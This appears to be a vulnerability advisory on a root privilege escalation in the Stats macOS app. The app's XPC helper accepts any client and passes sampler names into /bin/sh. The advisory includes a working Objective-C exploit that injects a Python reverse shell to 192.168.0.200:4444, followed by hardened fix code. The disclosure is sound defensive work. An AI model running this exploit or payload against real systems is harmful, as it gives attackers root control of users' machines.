Local Privilege Escalation via Exposed XPC Method Due to Client Verification Failure
Description
The Stats application is vulnerable to a local privilege escalation due to the insecure implementation of its XPC service. The application registers a Mach service under the name eu.exelban.Stats.SMC.Helper. The associated binary, eu.exelban.Stats.SMC.Helper, is a privileged helper tool that runs as root and executes actions requiring elevated privileges on behalf of the client, such as setting fan modes, adjusting fan speeds, and running the powermetrics command.
The root cause of this vulnerability lies in the shouldAcceptNewConnection method of the listener delegate, which unconditionally returns true, allowing any XPC client to connect to the service without any form of verification. As a result, any local process, regardless of its signing identity or privilege level, can establish a connection to the Mach service and invoke every method exposed by the HelperTool interface.
```swift
func listener(_ listener: NSXPCListener, shouldAcceptNewConnection connection: NSXPCConnection) -> Bool {
    connection.exportedInterface = NSXPCInterface(with: HelperProtocol.self)
    connection.exportedObject = self
    connection.invalidationHandler = {
        if let connectionIndex = self.connections.firstIndex(of: connection) {
            self.connections.remove(at: connectionIndex)
        }
        if self.connections.isEmpty {
            self.shouldQuit = true
        }
    }
    self.connections.append(connection)
    connection.resume()
    return true // no check on who the peer is
}
```
Among the exposed methods, setFanMode and setFanSpeed can destabilize the user's device and even pose physical risks, such as overheating or system instability:
```swift
func setFanMode(id: Int, mode: Int, completion: @escaping (String?) -> Void)
func setFanSpeed(id: Int, value: Int, completion: @escaping (String?) -> Void)
```
The powermetrics method is particularly dangerous: the sampler names supplied by the client are interpolated into a command string that is then executed with /bin/sh -c, which results in a command injection vulnerability allowing the execution of arbitrary commands with root privileges. This effectively grants attackers full control over the system.
```swift
func powermetrics(_ samplers: [String], completion: @escaping (String?) -> Void) {
    // Client-controlled strings are concatenated straight into a shell command line.
    let result = syncShell("powermetrics -n 1 -s \(samplers.joined(separator: ",")) --sample-rate 1000")
    if let error = result.error, !error.isEmpty {
        NSLog("error call powermetrics: \(error)")
        completion(nil)
        return
    }
    completion(result.output)
}

public func syncShell(_ args: String) -> (output: String?, error: String?) {
    let task = Process()
    task.launchPath = "/bin/sh"
    task.arguments = ["-c", args] // the shell interprets ';', '|', '$(...)' etc. in args
    let outputPipe = Pipe()
    let errorPipe = Pipe()
    defer {
        outputPipe.fileHandleForReading.closeFile()
        errorPipe.fileHandleForReading.closeFile()
    }
    task.standardOutput = outputPipe
    task.standardError = errorPipe
    do {
        try task.run()
    } catch let err {
        return (nil, "syncShell: \(err.localizedDescription)")
    }
    let outputData = outputPipe.fileHandleForReading.readDataToEndOfFile()
    let errorData = errorPipe.fileHandleForReading.readDataToEndOfFile()
    let output = String(data: outputData, encoding: .utf8)
    let error = String(data: errorData, encoding: .utf8)
    return (output, error)
}
```
Impact
An attacker can exploit this vulnerability to modify the hardware settings of the user’s device and execute arbitrary code with root privileges.
Reproduction
To avoid potential hardware damage, this demonstration focuses solely on the attack path to obtain root privileges without altering the device's hardware settings.
Step 1: Below is a custom XPC client (exploit) to demonstrate the issue. Feel free to change the value of maliciousSamplers to include different command payloads:
```objc
#import <Foundation/Foundation.h>

// Mirror of the helper's exported interface, as Swift exposes it to Objective-C.
@protocol HelperProtocol
- (void)versionWithCompletion:(void (^)(NSString * _Nonnull))completion;
- (void)setSMCPath:(NSString * _Nonnull)path;
- (void)setFanModeWithId:(NSInteger)id mode:(NSInteger)mode completion:(void (^)(NSString * _Nullable))completion;
- (void)setFanSpeedWithId:(NSInteger)id value:(NSInteger)value completion:(void (^)(NSString * _Nullable))completion;
- (void)powermetrics:(NSArray<NSString *> * _Nonnull)samplers completion:(void (^)(NSString * _Nullable))completion;
- (void)uninstall;
@end

int main() {
    NSString *service_name = @"eu.exelban.Stats.SMC.Helper";
    // 0x1000 == NSXPCConnectionPrivileged: connect to the launchd daemon's Mach service.
    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
    [connection setRemoteObjectInterface:interface];
    [connection resume];

    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error) {
        NSLog(@"[-] Something went wrong");
        NSLog(@"[-] Error: %@", error);
    }];
    NSLog(@"Objection: %@", obj);
    NSLog(@"Connection: %@", connection);

    // The second "sampler" terminates the powermetrics command with ';' and appends
    // a Python reverse shell, which /bin/sh -c runs as root inside the helper.
    NSArray<NSString *> *maliciousSamplers = @[
        @"cpu_power",
        @"gpu_power; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.200\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';"
    ];
    [obj powermetrics:maliciousSamplers completion:^(NSString * _Nullable result) {
        if (result) {
            NSLog(@"Result: %@", result);
        } else {
            NSLog(@"An error occurred.");
        }
    }];
    NSLog(@"Exploitation completed\n");

    // Keep the client alive long enough for the XPC message to be delivered; the helper
    // blocks on the reverse shell, so the completion handler does not fire while it is open.
    [NSThread sleepForTimeInterval:5.0];
    return 0;
}
```
Step 2: To simulate an attacker’s Command and Control (C2) server, set up a netcat listener on another host.
Step 3: Compile and execute the exploit, and we will quickly gain a root reverse shell.
Recommendation
Implement robust client verification, including code signing checks and audit token verification (the client PID is not a secure identifier: PIDs are reused, and a check keyed on the PID can be raced between lookup and use). A good example can be found in https://github.com/objective-see/BlockBlock/blob/aa83b7326a4823e78cb2f2d214d39bc8af26ed79/Daemon/Daemon/XPCListener.m#L147. Additionally, ensure that the hardened runtime is enabled for the client application and restrict sensitive entitlements, such as com.apple.security.cs.disable-library-validation, com.apple.security.cs.allow-dyld-environment-variables, and com.apple.private.security.clear-library-validation, among others; a client that can be made to load arbitrary code would let an attacker inherit its signing identity and pass the check.
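The following listener delegate is an added example of the recommended check, written for this advisory and not taken from the Stats project or from BlockBlock. It resolves the peer's SecCode from the audit token (not the PID) and evaluates a code-signing requirement before the connection is resumed. The requirement string, the "TEAM_ID" placeholder and the assumed bundle identifier eu.exelban.Stats are illustrative and must be replaced with the app's real values; reading NSXPCConnection's auditToken via KVC relies on a private property, which is the approach most open-source helpers use.

```swift
import Foundation
import Security

// Declared from the method list shown earlier in this advisory; the real protocol lives in the Stats source.
@objc protocol HelperProtocol {
    func setFanMode(id: Int, mode: Int, completion: @escaping (String?) -> Void)
    func setFanSpeed(id: Int, value: Int, completion: @escaping (String?) -> Void)
    func powermetrics(_ samplers: [String], completion: @escaping (String?) -> Void)
}

/// Requirement the connecting process must satisfy. ASSUMPTION: "TEAM_ID" and the bundle
/// identifier are placeholders; take the real values from the Developer ID certificate and Info.plist.
let clientRequirement =
    "anchor apple generic and identifier \"eu.exelban.Stats\" and certificate leaf[subject.OU] = \"TEAM_ID\""

extension NSXPCConnection {
    /// Kernel-stamped audit token of the peer. `auditToken` is a private NSXPCConnection property
    /// (read via KVC); unlike `processIdentifier` it names this exact process instance, so it is
    /// immune to PID reuse between the check and the call.
    var peerAuditToken: audit_token_t? {
        guard let value = self.value(forKey: "auditToken") as? NSValue else { return nil }
        var token = audit_token_t()
        value.getValue(&token, size: MemoryLayout<audit_token_t>.size)
        return token
    }
}

/// True only if the peer has a valid code signature that satisfies `requirementText`.
func clientSatisfies(_ connection: NSXPCConnection, requirement requirementText: String) -> Bool {
    guard var token = connection.peerAuditToken else { return false }
    let tokenData = Data(bytes: &token, count: MemoryLayout<audit_token_t>.size)

    // Look the guest up by audit token rather than by PID.
    var code: SecCode?
    let attrs: [CFString: Any] = [kSecGuestAttributeAudit: tokenData]
    guard SecCodeCopyGuestWithAttributes(nil, attrs as CFDictionary, [], &code) == errSecSuccess,
          let clientCode = code else { return false }

    var requirement: SecRequirement?
    guard SecRequirementCreateWithString(requirementText as CFString, [], &requirement) == errSecSuccess,
          let req = requirement else { return false }

    // Verifies the signature and evaluates the requirement in one call.
    return SecCodeCheckValidity(clientCode, [], req) == errSecSuccess
}

final class HelperListener: NSObject, NSXPCListenerDelegate {
    private let helper: HelperProtocol   // the object that actually implements the methods
    private var connections: [NSXPCConnection] = []

    init(exporting helper: HelperProtocol) {
        self.helper = helper
    }

    func listener(_ listener: NSXPCListener, shouldAcceptNewConnection connection: NSXPCConnection) -> Bool {
        guard clientSatisfies(connection, requirement: clientRequirement) else {
            NSLog("rejected XPC client that fails the code-signing requirement")
            return false   // connection is never resumed; the peer sees an invalidation
        }
        connection.exportedInterface = NSXPCInterface(with: HelperProtocol.self)
        connection.exportedObject = helper
        connection.invalidationHandler = { [weak self] in
            self?.connections.removeAll { $0 == connection }
        }
        connections.append(connection)
        connection.resume()
        return true
    }
}
```

The requirement pins both the signing team and the bundle identifier, so a binary signed by a different developer, an ad-hoc signed copy, or an unsigned client is refused before any method can be invoked. The check is only as strong as the client it trusts, which is why the entitlement restrictions above matter: a client that allows library injection or DYLD environment variables can be hijacked and would still satisfy the requirement.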
To mitigate command injection vulnerabilities, it is crucial to properly validate and escape command arguments. Below is an example implementation for the powermetrics method. Note that it filters out unrecognised samplers rather than rejecting the request, so a caller never learns that part of its input was dropped, and the allowlist must contain the actual sampler names powermetrics accepts (the exploit above uses cpu_power and gpu_power). It also still routes the command through syncShell and therefore /bin/sh -c; passing the arguments directly to Process with no shell removes the injection surface altogether.

```swift
func powermetrics(_ samplers: [String], completion: @escaping (String?) -> Void) {
    // Define a list of allowed samplers
    let allowedSamplers = ["cpu", "gpu", "memory", "thermal"] // Add more as needed

    // Validate samplers against the allowed list
    let validSamplers = samplers.filter { allowedSamplers.contains($0) }
    if validSamplers.isEmpty {
        NSLog("Invalid samplers provided.")
        completion(nil)
        return
    }

    // Construct the command with validated inputs
    let command = "powermetrics -n 1 -s \(validSamplers.joined(separator: ",")) --sample-rate 1000"

    // Execute the command (ensure `syncShell` is implemented securely)
    let result = syncShell(command)
    if let error = result.error, !error.isEmpty {
        NSLog("Error executing powermetrics: \(error)")
        completion(nil)
        return
    }
    completion(result.output)
}
```
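As an added example (not the Stats project's code), the variant below goes one step further than the allowlist above: it rejects the whole request if any sampler is unknown, and it executes /usr/bin/powermetrics through Process with an argv array, so no shell ever parses the client's input. The allowlist contents beyond cpu_power and gpu_power are an assumption for this example and should be tuned to what the helper actually needs.

```swift
import Foundation

/// Errors surfaced to the caller instead of a silently trimmed result.
enum PowermetricsError: Error {
    case unknownSampler(String)
    case launchFailed(String)
    case exitStatus(Int32)
}

/// Sampler names the helper is willing to pass on. cpu_power and gpu_power appear in the
/// exploit above; ASSUMPTION: thermal and smc are added here only as plausible extras.
let allowedSamplers: Set<String> = ["cpu_power", "gpu_power", "thermal", "smc"]

/// Fail closed: one unknown entry rejects the whole request. The injected value
/// "gpu_power; python3 -c '...'" is not in the set and is therefore refused here.
func validateSamplers(_ samplers: [String]) throws -> [String] {
    guard !samplers.isEmpty else { throw PowermetricsError.unknownSampler("") }
    for sampler in samplers where !allowedSamplers.contains(sampler) {
        throw PowermetricsError.unknownSampler(sampler)
    }
    return samplers
}

/// Runs powermetrics with no shell. Each element of `arguments` reaches execve() as one argv
/// entry, so ';', '|' or '$(...)' inside a sampler name would be literal bytes in a single
/// argument rather than command separators, even if the allowlist were bypassed.
func runPowermetrics(_ samplers: [String]) throws -> String {
    let validated = try validateSamplers(samplers)

    let task = Process()
    task.executableURL = URL(fileURLWithPath: "/usr/bin/powermetrics") // absolute path, no PATH lookup
    task.arguments = ["-n", "1", "-s", validated.joined(separator: ","), "--sample-rate", "1000"]

    let stdout = Pipe()
    let stderr = Pipe()
    task.standardOutput = stdout
    task.standardError = stderr

    do {
        try task.run()
    } catch {
        throw PowermetricsError.launchFailed(error.localizedDescription)
    }

    let output = stdout.fileHandleForReading.readDataToEndOfFile()
    let diagnostics = stderr.fileHandleForReading.readDataToEndOfFile()
    task.waitUntilExit()

    guard task.terminationStatus == 0 else {
        NSLog("powermetrics failed: \(String(decoding: diagnostics, as: UTF8.self))")
        throw PowermetricsError.exitStatus(task.terminationStatus)
    }
    return String(decoding: output, as: UTF8.self)
}

/// Same XPC-facing signature as the helper's method, so it can replace it directly.
func powermetrics(_ samplers: [String], completion: @escaping (String?) -> Void) {
    do {
        completion(try runPowermetrics(samplers))
    } catch {
        NSLog("powermetrics request refused: \(error)")
        completion(nil)
    }
}
```

With this in place the exploit's payload is stopped twice: validateSamplers throws on the second element before anything is launched, and even a sampler that slipped through would be handed to powermetrics as an ordinary argument, which it would reject as an unknown sampler name rather than execute. Keeping the validation in a separate function also makes it straightforward to unit test with hostile inputs.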